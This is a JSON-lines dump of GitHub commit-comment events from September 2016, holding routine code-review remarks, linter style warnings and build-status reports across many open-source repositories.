{"id":"4563291025","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19022670,"position":null,"line":null,"path":null,"commit_id":"19c786f507bf2459cdef3bbcc7999140dac28459","created_at":"2016-09-14T17:07:03Z","updated_at":"2016-09-14T17:07:03Z","body":"[tests/testthat/test_abc_smc_nltt.R:48:12:](https://github.com/richelbilderbeek/nLTT/blob/19c786f507bf2459cdef3bbcc7999140dac28459/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(nLTTstat(tree1, obs, \"abs\"))\n           ^~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:90:13:](https://github.com/richelbilderbeek/nLTT/blob/19c786f507bf2459cdef3bbcc7999140dac28459/tests/testthat/test_abc_smc_nltt.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( nLTTstat(tree1, obs, \"abs\"))\n            ^~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:111:4:](https://github.com/richelbilderbeek/nLTT/blob/19c786f507bf2459cdef3bbcc7999140dac28459/tests/testthat/test_abc_smc_nltt.R#L111) *style:* **Commented code should be removed.**\n```r\n​  #skip(\"this next test runs fine locally, but not on Travis\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-14T17:07:03Z"}
{"id":"4563293417","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022675,"position":null,"line":null,"path":null,"commit_id":"e99f9b6552ddf2d5943f1f0a5d1aaf73997a0dec","created_at":"2016-09-14T17:07:28Z","updated_at":"2016-09-14T17:07:28Z","body":"See comments in account schema"}},"created_at":"2016-09-14T17:07:28Z"}
{"id":"4563296210","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19022680,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-14T17:07:57Z","updated_at":"2016-09-14T17:07:57Z","body":"i think it would be difficult to notice the difference "}},"created_at":"2016-09-14T17:07:57Z"}
{"id":"4563303574","type":"CommitCommentEvent","actor":{"login":"DonQuixote007"},"repo":{"name":"DonQuixote007/Pancho-s-Sports-Streams"},"payload":{"comment":{"id":19022703,"position":1,"line":1,"path":"README.md","commit_id":"691b66571f287e845e0c10bd56885d09e11f47f0","created_at":"2016-09-14T17:09:20Z","updated_at":"2016-09-14T17:09:20Z","body":"#EXTM3U"}},"created_at":"2016-09-14T17:09:20Z"}
{"id":"4563305379","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"asergeev427/myjava"},"payload":{"comment":{"id":19022710,"position":20,"line":14,"path":"GeometricFigures/Line.java","commit_id":"619ae82250ea14588dec9013d92ff1c811d6ad60","created_at":"2016-09-14T17:09:40Z","updated_at":"2016-09-14T17:09:40Z","body":"Для length объявлен как поле?"}},"created_at":"2016-09-14T17:09:40Z"}
{"id":"4563306577","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022716,"position":null,"line":null,"path":null,"commit_id":"b29746ce8f28758abc580d8419eb1efd49f190be","created_at":"2016-09-14T17:09:54Z","updated_at":"2016-09-14T17:09:54Z","body":"Description is good, but lets move that to the documentation as it is a little too detailed"}},"created_at":"2016-09-14T17:09:54Z"}
{"id":"4563307808","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19022728,"position":null,"line":null,"path":null,"commit_id":"112e7eb1358ab4bcbaea7a61e195fba29b7e0d13","created_at":"2016-09-14T17:10:08Z","updated_at":"2016-09-14T17:10:08Z","body":"Ah, I see, I understand better now. Thank you for the enlightening explanation!"}},"created_at":"2016-09-14T17:10:08Z"}
{"id":"4563308920","type":"CommitCommentEvent","actor":{"login":"shakedb70"},"repo":{"name":"Spikes-2212-Programming-Guild/SLSubsystemSuit"},"payload":{"comment":{"id":19022740,"position":null,"line":null,"path":null,"commit_id":"639e6ad1c2831139b86b3cb8d52ba625dc50a03f","created_at":"2016-09-14T17:10:21Z","updated_at":"2016-09-14T17:10:21Z","body":"What potention and this is kind of creepy"}},"created_at":"2016-09-14T17:10:21Z"}
{"id":"4563309057","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"asergeev427/myjava"},"payload":{"comment":{"id":19022741,"position":27,"line":21,"path":"GeometricFigures/Line.java","commit_id":"619ae82250ea14588dec9013d92ff1c811d6ad60","created_at":"2016-09-14T17:10:23Z","updated_at":"2016-09-14T17:10:23Z","body":"Логичнее метод получения длины называть getLength, а вот toString делать как и в Point - выводящий структуру объекта."}},"created_at":"2016-09-14T17:10:23Z"}
{"id":"4563309174","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19022743,"position":null,"line":null,"path":null,"commit_id":"c8eada605e94b85d6e2de4f4e2f358aa30d33e83","created_at":"2016-09-14T17:10:24Z","updated_at":"2016-09-14T17:10:24Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2307 of 2470 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.4%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T17:10:24Z"}
{"id":"4563309826","type":"CommitCommentEvent","actor":{"login":"borgar"},"repo":{"name":"HiDefTextiles/HiDefKnits"},"payload":{"comment":{"id":19022746,"position":null,"line":null,"path":null,"commit_id":"86d6f235767e9328e655361c02aeca49d4f04456","created_at":"2016-09-14T17:10:31Z","updated_at":"2016-09-14T17:10:31Z","body":"👍 Looking forward to seeing this grow up."}},"created_at":"2016-09-14T17:10:31Z"}
{"id":"4563310540","type":"CommitCommentEvent","actor":{"login":"RePod"},"repo":{"name":"RePod/psdle"},"payload":{"comment":{"id":19022753,"position":null,"line":null,"path":null,"commit_id":"a17e5e91dab3337c534c5fbf5c02d433679cb3ac","created_at":"2016-09-14T17:10:38Z","updated_at":"2016-09-14T17:10:38Z","body":"In retrospect this is useful when `repod.psdle.config.specific_categories` is `true` which uses higher accuracy categories, but are not translated and would definitely be `undefined`."}},"created_at":"2016-09-14T17:10:38Z"}
{"id":"4563313349","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022801,"position":null,"line":null,"path":null,"commit_id":"2670a4907318c7ac38b376493aaba8ed40de4f36","created_at":"2016-09-14T17:11:11Z","updated_at":"2016-09-14T17:11:11Z","body":"See comments in account schema"}},"created_at":"2016-09-14T17:11:11Z"}
{"id":"4563313488","type":"CommitCommentEvent","actor":{"login":"mihaip"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19022804,"position":65,"line":2360,"path":"src/com/google/javascript/jscomp/Compiler.java","commit_id":"31e5b5199eaf3fdb8920dc779cf71c99f046a1fe","created_at":"2016-09-14T17:11:12Z","updated_at":"2016-09-14T17:11:12Z","body":"@MatrixFrog: would you be opposed to making this method public? I was relying on `newExternInput` in https://github.com/mihaip/react-closure-compiler/blob/dc46c2528f994e68884a9b76e91442835e9737fe/src/info/persistent/react/jscomp/ReactCompilerPass.java#L171, and now there is no publicly-accessible API for an externally-defined compiler pass to define new externs."}},"created_at":"2016-09-14T17:11:12Z"}
{"id":"4563315476","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19022843,"position":null,"line":null,"path":null,"commit_id":"ea0b2915100cd8a95483f01034ffc2210ee4136f","created_at":"2016-09-14T17:11:33Z","updated_at":"2016-09-14T17:11:33Z","body":"lgtm, boring."}},"created_at":"2016-09-14T17:11:33Z"}
{"id":"4563317115","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022915,"position":null,"line":null,"path":null,"commit_id":"ffba5fe15f502e7630833a1baff691bed67be3c2","created_at":"2016-09-14T17:11:50Z","updated_at":"2016-09-14T17:11:50Z","body":"Lets skip this until we need to use it somewhere "}},"created_at":"2016-09-14T17:11:50Z"}
{"id":"4563317336","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19022921,"position":null,"line":null,"path":null,"commit_id":"5e1c62089e91a36319564d7fe5de59db90f19e66","created_at":"2016-09-14T17:11:53Z","updated_at":"2016-09-14T17:11:53Z","body":"lgtm, boring."}},"created_at":"2016-09-14T17:11:53Z"}
{"id":"4563318308","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19022931,"position":18,"line":357,"path":"youtube_dl/options.py","commit_id":"1b6712ab2378b2e8eb59f372fb51193f8d3bdc97","created_at":"2016-09-14T17:12:03Z","updated_at":"2016-09-14T17:12:03Z","body":"There is no need in AP prefix in `metavar`s."}},"created_at":"2016-09-14T17:12:03Z"}
{"id":"4563321798","type":"CommitCommentEvent","actor":{"login":"adriaaula"},"repo":{"name":"audy/richardson-2014"},"payload":{"comment":{"id":19022973,"position":null,"line":null,"path":null,"commit_id":"a31b0b6ed167bec2825de195a5cb412aecfea20c","created_at":"2016-09-14T17:12:42Z","updated_at":"2016-09-14T17:12:42Z","body":"One little thing, \r\n\r\nSince you calculate the normalization factors but  you doesn't use them for 'normalize' the data your return(physeq) simply retrieves a physeq object with the previous counts + 1. \r\n\r\nIn order to change that, a calculus of the normalization counts has to be done.  I have been writing something like that, but it needs to be checked out:\r\n\r\nSubstitute this:\r\n\r\n> counts <- t(z[[1]])\r\n\r\nFor this:\r\n\r\n>     lib.size <- z$samples$lib.size\r\n>     lib.size <- lib.size * z$samples$norm.factors\r\n>     counts <- t(z[[1]] *100 /  lib.size)"}},"created_at":"2016-09-14T17:12:42Z"}
{"id":"4563322579","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19022977,"position":null,"line":null,"path":null,"commit_id":"e46079ed74de38683f4c4edd24bf8f21862804c9","created_at":"2016-09-14T17:12:50Z","updated_at":"2016-09-14T17:12:50Z","body":"lgtm, interesting."}},"created_at":"2016-09-14T17:12:50Z"}
{"id":"4563324975","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19023044,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T17:13:17Z","updated_at":"2016-09-14T17:13:17Z","body":"let's do a 3 way today...or does that sound bad..."}},"created_at":"2016-09-14T17:13:17Z"}
{"id":"4563325378","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"eflores0227/sep-assignments"},"payload":{"comment":{"id":19023062,"position":2,"line":2,"path":"02-algorithms/04-complexity/intro-to-complexity.txt","commit_id":"3ffe255ce669e6fc2180f4d9829d3fd07c613f83","created_at":"2016-09-14T17:13:21Z","updated_at":"2016-09-14T17:13:21Z","body":"You could say your would... crash... before you got there."}},"created_at":"2016-09-14T17:13:21Z"}
{"id":"4563328098","type":"CommitCommentEvent","actor":{"login":"MayeulChassagnard"},"repo":{"name":"MayeulChassagnard/CTK"},"payload":{"comment":{"id":19023134,"position":null,"line":null,"path":null,"commit_id":"4c36ce01b64c7ad203128a4dc99ad381f43e8ab4","created_at":"2016-09-14T17:13:50Z","updated_at":"2016-09-14T17:13:50Z","body":"@jcfr It seems that self.object() is not a callable object (after foo_class is instantiated) and that would be the reason that I can't see the attribute of Bar class.\r\nDo you know if I can make it callable or where come from the problem if it doesn't come from self.object()?"}},"created_at":"2016-09-14T17:13:50Z"}
{"id":"4563328833","type":"CommitCommentEvent","actor":{"login":"GNANAPRAKASHM"},"repo":{"name":"GNANAPRAKASHM/HELLO-world"},"payload":{"comment":{"id":19023139,"position":null,"line":null,"path":null,"commit_id":"710d2d1be116a0c993a151b846471bbd2c9661c2","created_at":"2016-09-14T17:13:58Z","updated_at":"2016-09-14T17:13:58Z","body":"This is my 2nd cmd"}},"created_at":"2016-09-14T17:13:58Z"}
{"id":"4563330925","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19023156,"position":null,"line":null,"path":null,"commit_id":"a73755699d36ee2459137dc3c4d759422541b75e","created_at":"2016-09-14T17:14:23Z","updated_at":"2016-09-14T17:14:23Z","body":"I would say just assets, not necessarily receivables as that can have accounting connotations"}},"created_at":"2016-09-14T17:14:23Z"}
{"id":"4563332191","type":"CommitCommentEvent","actor":{"login":"vskh"},"repo":{"name":"webdriverio/webdrivercss"},"payload":{"comment":{"id":19023165,"position":28,"line":56,"path":"package.json","commit_id":"cc4c99410025bc0aab9810dbdc1ab2314881c37f","created_at":"2016-09-14T17:14:36Z","updated_at":"2016-09-14T17:14:36Z","body":"Hi there,\r\n\r\nI found myself confused with versioning. The description states that webdrivercss is not yet compatible with v3.x of webdriverio. However, it depends on v4.x. I tried to run it with wdio v4.x and it does not seem to work (not breaking but bailing out at setScreenWidth.js.\r\n\r\nCould you please clarify which version of wdio does webdrivercss require to work?\r\n\r\nThanks in advance,\r\nV"}},"created_at":"2016-09-14T17:14:36Z"}
{"id":"4563332360","type":"CommitCommentEvent","actor":{"login":"chargome"},"repo":{"name":"chargome/JustATest"},"payload":{"comment":{"id":19023166,"position":null,"line":null,"path":null,"commit_id":"3f260c679bf9523ae69b44eda908b427b16a349d","created_at":"2016-09-14T17:14:38Z","updated_at":"2016-09-14T17:14:38Z","body":"niceee"}},"created_at":"2016-09-14T17:14:38Z"}
{"id":"4563334395","type":"CommitCommentEvent","actor":{"login":"bozana"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19023185,"position":84,"line":287,"path":"plugins/importexport/native/NativeImportExportPlugin.inc.php","commit_id":"92823b17655eb48aa076c65072e132e993d73f39","created_at":"2016-09-14T17:15:02Z","updated_at":"2016-09-14T17:15:02Z","body":"shouldn't this be written into the $xmlFile?"}},"created_at":"2016-09-14T17:15:02Z"}
{"id":"4563334996","type":"CommitCommentEvent","actor":{"login":"ChadKillingsworth"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19023195,"position":65,"line":2360,"path":"src/com/google/javascript/jscomp/Compiler.java","commit_id":"31e5b5199eaf3fdb8920dc779cf71c99f046a1fe","created_at":"2016-09-14T17:15:10Z","updated_at":"2016-09-14T17:15:10Z","body":"Reverse question: Is there any reason you can't submit your react specific changes back to the main compiler project? We have multiple library-specific passes already."}},"created_at":"2016-09-14T17:15:10Z"}
{"id":"4563335719","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19023200,"position":null,"line":null,"path":null,"commit_id":"f7eae13de54f15516a3b641e90a146a0e29734dc","created_at":"2016-09-14T17:15:19Z","updated_at":"2016-09-14T17:15:19Z","body":"Good description lets move this to the documentation and cite that definition"}},"created_at":"2016-09-14T17:15:19Z"}
{"id":"4563336688","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19023202,"position":null,"line":null,"path":null,"commit_id":"c6f6dcc919e99a6e4b7e334618ca2d960832086a","created_at":"2016-09-14T17:15:29Z","updated_at":"2016-09-14T17:15:29Z","body":"You need to move the mutex_lock as well"}},"created_at":"2016-09-14T17:15:29Z"}
{"id":"4563337837","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19023207,"position":null,"line":null,"path":null,"commit_id":"9ccea028926324e679f668dbfa909e3d26ac31a7","created_at":"2016-09-14T17:15:41Z","updated_at":"2016-09-14T17:15:41Z","body":"See comments in account schema"}},"created_at":"2016-09-14T17:15:41Z"}
{"id":"4563345411","type":"CommitCommentEvent","actor":{"login":"bozana"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19023228,"position":30,"line":50,"path":"plugins/importexport/native/locale/en_US/locale.xml","commit_id":"92823b17655eb48aa076c65072e132e993d73f39","created_at":"2016-09-14T17:17:07Z","updated_at":"2016-09-14T17:17:07Z","body":"Where is this key used?"}},"created_at":"2016-09-14T17:17:07Z"}
{"id":"4563346906","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19023231,"position":null,"line":null,"path":null,"commit_id":"fceea1ab3ef30c258f454bae6ae3e7dbcdea9251","created_at":"2016-09-14T17:17:23Z","updated_at":"2016-09-14T17:17:23Z","body":"Again, good description, let's move it to the documentation and cite it. Here we should describe the data item, not necessarily define the terms."}},"created_at":"2016-09-14T17:17:23Z"}
{"id":"4563349026","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19023239,"position":null,"line":null,"path":null,"commit_id":"fe89faaf6b06b3ee5b4de259e8b23b0b2e9fd72b","created_at":"2016-09-14T17:17:45Z","updated_at":"2016-09-14T17:17:45Z","body":"No issue with the zero'ing of everything here but devm_kzalloc() already did it"}},"created_at":"2016-09-14T17:17:45Z"}
{"id":"4563352859","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023247,"position":null,"line":null,"path":null,"commit_id":"d7d3056b51e3a2d8d2ea70b2b4979bd8eab134d6","created_at":"2016-09-14T17:18:27Z","updated_at":"2016-09-14T17:18:27Z","body":"lgtm boring."}},"created_at":"2016-09-14T17:18:27Z"}
{"id":"4563355659","type":"CommitCommentEvent","actor":{"login":"justjofe"},"repo":{"name":"justjofe/ragemode"},"payload":{"comment":{"id":19023250,"position":null,"line":null,"path":null,"commit_id":"7e67f46832a8ab98a66bfcf4328b40bb01e95dd2","created_at":"2016-09-14T17:18:58Z","updated_at":"2016-09-14T17:18:58Z","body":"Actually, it was not the installation section but the development setup section."}},"created_at":"2016-09-14T17:18:58Z"}
{"id":"4563355848","type":"CommitCommentEvent","actor":{"login":"AhmedRamadanElamir"},"repo":{"name":"AhmedRamadanElamir/Agrisource-Data"},"payload":{"comment":{"id":19023251,"position":null,"line":null,"path":null,"commit_id":"c26892adee821a2d4fa5f8afaf3f407802d7f24e","created_at":"2016-09-14T17:19:01Z","updated_at":"2016-09-14T17:19:01Z","body":"DHT Sensor"}},"created_at":"2016-09-14T17:19:01Z"}
{"id":"4563358289","type":"CommitCommentEvent","actor":{"login":"ArekSredzki"},"repo":{"name":"EvgeneOskin/electron-release-server"},"payload":{"comment":{"id":19023261,"position":36,"line":59,"path":"config/env/production.js","commit_id":"12ae16043d6460c205971894c8e9d5bb7104e8e1","created_at":"2016-09-14T17:19:27Z","updated_at":"2016-09-14T17:19:27Z","body":"You really shouldn't commit this :)"}},"created_at":"2016-09-14T17:19:27Z"}
{"id":"4563358422","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"eflores0227/sep-assignments"},"payload":{"comment":{"id":19023262,"position":10,"line":10,"path":"02-algorithms/04-complexity/intro-to-complexity.txt","commit_id":"3ffe255ce669e6fc2180f4d9829d3fd07c613f83","created_at":"2016-09-14T17:19:29Z","updated_at":"2016-09-14T17:19:29Z","body":"Expontial, not logarithmic."}},"created_at":"2016-09-14T17:19:29Z"}
{"id":"4563359376","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023265,"position":null,"line":null,"path":null,"commit_id":"386c95c9d0c070ad01f4a1daa7bfef6210b83e5b","created_at":"2016-09-14T17:19:39Z","updated_at":"2016-09-14T17:19:39Z","body":"lgtm, boring."}},"created_at":"2016-09-14T17:19:39Z"}
{"id":"4563365934","type":"CommitCommentEvent","actor":{"login":"EvgeneOskin"},"repo":{"name":"EvgeneOskin/electron-release-server"},"payload":{"comment":{"id":19023280,"position":36,"line":59,"path":"config/env/production.js","commit_id":"12ae16043d6460c205971894c8e9d5bb7104e8e1","created_at":"2016-09-14T17:20:52Z","updated_at":"2016-09-14T17:20:52Z","body":"Sure, you right! :) Missed it..."}},"created_at":"2016-09-14T17:20:52Z"}
{"id":"4563369700","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19023290,"position":null,"line":null,"path":null,"commit_id":"fe89faaf6b06b3ee5b4de259e8b23b0b2e9fd72b","created_at":"2016-09-14T17:21:33Z","updated_at":"2016-09-14T17:21:33Z","body":"Do these ever get referenced without a bq24190_read() beforehand? So zeroing I don't think matters"}},"created_at":"2016-09-14T17:21:33Z"}
{"id":"4563373870","type":"CommitCommentEvent","actor":{"login":"sahrens"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19023301,"position":33,"line":103,"path":"Libraries/Interaction/InteractionManager.js","commit_id":"be09cccb1f2153f84da85214b31cd4cdb4e783ec","created_at":"2016-09-14T17:22:18Z","updated_at":"2016-09-14T17:22:18Z","body":"Addressed in #9886"}},"created_at":"2016-09-14T17:22:18Z"}
{"id":"4563374953","type":"CommitCommentEvent","actor":{"login":"addmitriev"},"repo":{"name":"htmlacademy-javascript/140982-kekstagram"},"payload":{"comment":{"id":19023306,"position":5,"line":11,"path":"src/upload.js","commit_id":"e817fe8aab74e08f59cb36f474741a9d4b52b67f","created_at":"2016-09-14T17:22:30Z","updated_at":"2016-09-14T17:22:30Z","body":"вот это забыл удалить"}},"created_at":"2016-09-14T17:22:30Z"}
{"id":"4563376309","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19023311,"position":18,"line":1291,"path":"drivers/power/bq24190_charger.c","commit_id":"fe89faaf6b06b3ee5b4de259e8b23b0b2e9fd72b","created_at":"2016-09-14T17:22:46Z","updated_at":"2016-09-14T17:22:46Z","body":"So want a uevent happening at every interrupt?"}},"created_at":"2016-09-14T17:22:46Z"}
{"id":"4563378065","type":"CommitCommentEvent","actor":{"login":"josephwb"},"repo":{"name":"OpenTreeOfLife/reference-taxonomy"},"payload":{"comment":{"id":19023316,"position":null,"line":null,"path":null,"commit_id":"7904ad7fac929556aae133d1211116bfd0854f82","created_at":"2016-09-14T17:23:05Z","updated_at":"2016-09-14T17:23:05Z","body":"I think this version is safer? Anyway, this is what I was getting with the original find command:\r\n```\r\nrm -f `find . -name *.class`\r\nfind: paths must precede expression: ncbi_ott_assignments$py.class\r\nUsage: find [-H] [-L] [-P] [-Olevel] [-D help|tree|search|stat|rates|opt|exec] [path...] [expression]\r\n```"}},"created_at":"2016-09-14T17:23:05Z"}
{"id":"4563380773","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023322,"position":null,"line":null,"path":null,"commit_id":"86be82e7d3de66c558f0420b60948b18e308778f","created_at":"2016-09-14T17:23:33Z","updated_at":"2016-09-14T17:23:33Z","body":"lgtm"}},"created_at":"2016-09-14T17:23:33Z"}
{"id":"4563382562","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023324,"position":null,"line":null,"path":null,"commit_id":"ad39ef3810a2a3fa1faa94f2ca83f60d6cb1e9f8","created_at":"2016-09-14T17:23:52Z","updated_at":"2016-09-14T17:23:52Z","body":"lgtm, boring."}},"created_at":"2016-09-14T17:23:52Z"}
{"id":"4563386701","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023337,"position":null,"line":null,"path":null,"commit_id":"cb31179ce469bbb35197ac49da2a7eb2762385f5","created_at":"2016-09-14T17:24:37Z","updated_at":"2016-09-14T17:24:37Z","body":"lgtm, squash all permissions changes together."}},"created_at":"2016-09-14T17:24:37Z"}
{"id":"4563386782","type":"CommitCommentEvent","actor":{"login":"AshizRV"},"repo":{"name":"AshizRV/hello-world"},"payload":{"comment":{"id":19023338,"position":2,"line":2,"path":"README.md","commit_id":"28f3da61b44319f7ad433fb94f3617f629e870c3","created_at":"2016-09-14T17:24:38Z","updated_at":"2016-09-14T17:24:38Z","body":"This is the master copy"}},"created_at":"2016-09-14T17:24:38Z"}
{"id":"4563386820","type":"CommitCommentEvent","actor":{"login":"leonard84"},"repo":{"name":"jeremylong/DependencyCheck"},"payload":{"comment":{"id":19023339,"position":null,"line":null,"path":null,"commit_id":"19243c479c91970e85e673b5674768fa26f00df4","created_at":"2016-09-14T17:24:39Z","updated_at":"2016-09-14T17:24:39Z","body":"don't forget the fork mariadb"}},"created_at":"2016-09-14T17:24:39Z"}
{"id":"4563386839","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19023340,"position":19,"line":1292,"path":"drivers/power/bq24190_charger.c","commit_id":"fe89faaf6b06b3ee5b4de259e8b23b0b2e9fd72b","created_at":"2016-09-14T17:24:39Z","updated_at":"2016-09-14T17:24:39Z","body":"This is going to cause double uevents with the fuel gauge driver I suspect"}},"created_at":"2016-09-14T17:24:39Z"}
{"id":"4563387655","type":"CommitCommentEvent","actor":{"login":"AhmedRamadanElamir"},"repo":{"name":"AhmedRamadanElamir/Agrisource-Data"},"payload":{"comment":{"id":19023341,"position":null,"line":null,"path":null,"commit_id":"2912c9879a7da0599003bc6ce169928d5251dab2","created_at":"2016-09-14T17:24:48Z","updated_at":"2016-09-14T17:24:48Z","body":"CCS"}},"created_at":"2016-09-14T17:24:48Z"}
{"id":"4563388761","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19023344,"position":null,"line":null,"path":null,"commit_id":"7ab0afb3a8bf8bc2f93d2b4f9abf4c2d32b04228","created_at":"2016-09-14T17:25:00Z","updated_at":"2016-09-14T17:25:00Z","body":"Well, that's an idea indeed..."}},"created_at":"2016-09-14T17:25:00Z"}
{"id":"4563390151","type":"CommitCommentEvent","actor":{"login":"matobet"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19023348,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-14T17:25:16Z","updated_at":"2016-09-14T17:25:16Z","body":"@abellotti Rebased. I can confirm that @isimluk 's fix works, thanks!"}},"created_at":"2016-09-14T17:25:16Z"}
{"id":"4563390273","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023349,"position":null,"line":null,"path":null,"commit_id":"c6ec2b35892a1c386676a1ca82fe529c0a168de6","created_at":"2016-09-14T17:25:17Z","updated_at":"2016-09-14T17:25:17Z","body":"boring"}},"created_at":"2016-09-14T17:25:17Z"}
{"id":"4563391617","type":"CommitCommentEvent","actor":{"login":"ArekSredzki"},"repo":{"name":"MTRNord/electron-release-server"},"payload":{"comment":{"id":19023351,"position":5,"line":59,"path":"config/local.js","commit_id":"516ca3f9fcbbe38a5829ec9be1435b866a173523","created_at":"2016-09-14T17:25:30Z","updated_at":"2016-09-14T17:25:30Z","body":"Don't commit this value"}},"created_at":"2016-09-14T17:25:30Z"}
{"id":"4563391969","type":"CommitCommentEvent","actor":{"login":"ArekSredzki"},"repo":{"name":"MTRNord/electron-release-server"},"payload":{"comment":{"id":19023352,"position":26,"line":75,"path":"config/local.js","commit_id":"516ca3f9fcbbe38a5829ec9be1435b866a173523","created_at":"2016-09-14T17:25:34Z","updated_at":"2016-09-14T17:25:34Z","body":"Don't commit this value"}},"created_at":"2016-09-14T17:25:34Z"}
{"id":"4563392512","type":"CommitCommentEvent","actor":{"login":"mtholder"},"repo":{"name":"OpenTreeOfLife/reference-taxonomy"},"payload":{"comment":{"id":19023353,"position":null,"line":null,"path":null,"commit_id":"7904ad7fac929556aae133d1211116bfd0854f82","created_at":"2016-09-14T17:25:39Z","updated_at":"2016-09-14T17:25:39Z","body":"I'd think that using `-exec rm -f{} \\;` would be safer if there are spaces in a parent directory."}},"created_at":"2016-09-14T17:25:39Z"}
{"id":"4563394337","type":"CommitCommentEvent","actor":{"login":"mtholder"},"repo":{"name":"OpenTreeOfLife/reference-taxonomy"},"payload":{"comment":{"id":19023358,"position":null,"line":null,"path":null,"commit_id":"7904ad7fac929556aae133d1211116bfd0854f82","created_at":"2016-09-14T17:25:58Z","updated_at":"2016-09-14T17:25:58Z","body":"oops need a space between `-f` and `{}`"}},"created_at":"2016-09-14T17:25:58Z"}
